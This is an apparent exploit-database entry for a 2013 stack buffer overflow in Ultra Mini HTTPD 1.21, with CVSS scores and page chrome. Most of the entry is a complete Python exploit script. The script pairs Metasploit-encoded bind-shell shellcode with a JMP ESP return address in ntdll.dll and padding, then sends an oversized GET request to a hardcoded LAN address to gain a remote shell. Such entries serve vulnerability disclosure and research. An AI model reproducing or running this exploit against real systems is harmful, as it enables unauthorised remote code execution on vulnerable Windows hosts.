Ultra Mini HTTPD stack buffer overflow

2013-07-12 / 2013-08-01
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Ultra Mini HTTPD stack buffer overflow # Date: 10 July 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.picolix.jp/ # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html # Version: 1.21 # Tested on: Windows XP Professional SP2, English # # Description: # A buffer overflow is triggered when requesting a very long # resource name. # import socket import struct # msfpayload windows/shell_bind_tcp R | \ # msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c" # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shellcode = ( "\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9" + "\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d" + "\xc6\x1e\xa4\x9e\x16\x41\x2c\x7b\x27\x53\x4a\x0f\x15\x63" + "\x18\x5d\x95\x08\x4c\x76\x2e\x7c\x59\x79\x87\xcb\xbf\xb4" + "\x18\xfa\x7f\x1a\xda\x9c\x03\x61\x0e\x7f\x3d\xaa\x43\x7e" + "\x7a\xd7\xab\xd2\xd3\x93\x19\xc3\x50\xe1\xa1\xe2\xb6\x6d" + "\x99\x9c\xb3\xb2\x6d\x17\xbd\xe2\xdd\x2c\xf5\x1a\x56\x6a" + "\x26\x1a\xbb\x68\x1a\x55\xb0\x5b\xe8\x64\x10\x92\x11\x57" + "\x5c\x79\x2c\x57\x51\x83\x68\x50\x89\xf6\x82\xa2\x34\x01" + "\x51\xd8\xe2\x84\x44\x7a\x61\x3e\xad\x7a\xa6\xd9\x26\x70" + "\x03\xad\x61\x95\x92\x62\x1a\xa1\x1f\x85\xcd\x23\x5b\xa2" + "\xc9\x68\x38\xcb\x48\xd5\xef\xf4\x8b\xb1\x50\x51\xc7\x50" + "\x85\xe3\x8a\x3c\x6a\xde\x34\xbd\xe4\x69\x46\x8f\xab\xc1" + "\xc0\xa3\x24\xcc\x17\xc3\x1f\xa8\x88\x3a\x9f\xc9\x81\xf8" + "\xcb\x99\xb9\x29\x73\x72\x3a\xd5\xa6\xd5\x6a\x79\x18\x96" + "\xda\x39\xc8\x7e\x31\xb6\x37\x9e\x3a\x1c\x4e\x98\xf4\x44" + "\x03\x4f\xf5\x7a\xb2\xd3\x70\x9c\xde\xfb\xd4\x36\x76\x3e" + "\x03\x8f\xe1\x41\x61\xa3\xba\xd5\x3d\xad\x7c\xd9\xbd\xfb" + "\x2f\x76\x15\x6c\xbb\x94\xa2\x8d\xbc\xb0\x82\xc4\x85\x53" + "\x58\xb9\x44\xc5\x5d\x90\x3e\x66\xcf\x7f\xbe\xe1\xec\xd7" + "\xe9\xa6\xc3\x21\x7f\x5b\x7d\x98\x9d\xa6\x1b\xe3\x25\x7d" + "\xd8\xea\xa4\xf0\x64\xc9\xb6\xcc\x65\x55\xe2\x80\x33\x03" + "\x5c\x67\xea\xe5\x36\x31\x41\xac\xde\xc4\xa9\x6f\x98\xc8" + "\xe7\x19\x44\x78\x5e\x5c\x7b\xb5\x36\x68\x04\xab\xa6\x97" + "\xdf\x6f\xd6\xdd\x7d\xd9\x7f\xb8\x14\x5b\xe2\x3b\xc3\x98" + "\x1b\xb8\xe1\x60\xd8\xa0\x80\x65\xa4\x66\x79\x14\xb5\x02" + "\x7d\x8b\xb6\x06" ) # 7C941EED , JMP ESP , ntdll.dll payload = "A" * 5392 + struct.pack("<I", 0x7C941EED) payload += "\x81\xc4\xf0\xea\xff\xff" + shellcode + "B" * 4230 print "[+] sending payload, length", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.175", 80)) buf = ( "GET /" + payload + " HTTP/1.1\r\n" + "Host: 192.168.37.175" + "\r\n\r\n" ) s.send(buf) s.close()

References:

http://www.vector.co.jp/soft/winnt/net/se275154.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top